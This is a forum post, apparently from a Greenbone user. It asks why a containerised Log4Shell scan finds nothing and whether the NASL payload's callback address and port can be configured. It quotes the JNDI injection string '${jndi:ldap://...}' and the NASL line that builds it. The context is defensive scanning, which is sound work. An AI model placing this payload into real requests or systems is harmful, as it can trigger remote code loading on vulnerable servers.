Hi there,
first thanks for your fast reaction in general on this treat.
We scanned our network for log4shell from a container version of Greenbone (Docker Hub) and found no results. At a first look a nice result, but looking deeper into it we found that the payload has the form:
2021-12-20 10:39:41.354 INFO 1 --- [nio-8080-exec-3] HelloWorld : Received a request for API version ${jndi:ldap://172.18.0.3:15006/a}
The address 172.18.0.3 is the IP of the container Greenbone runs in and thus is not reachable by the outside. The IP seems to be random. I found the 4 NASL files at /data/var-lib/openvas/plugins/2021/apache/gb_log4j_CVE-2021-44228_*.nasl all contain this payload definition:
payload = "${jndi:ldap://" + ownip + ":" + rnd_port + "/a}";
A random port can’t be published by the container at runtime so there are my questions:
- When I change the payload locally - will this have any effect? Are the NASL files loaded when being executed or are they loaded at program start?
- Could there be a way to configure these settings, address and port, in the web GUI?
Best regards
Henri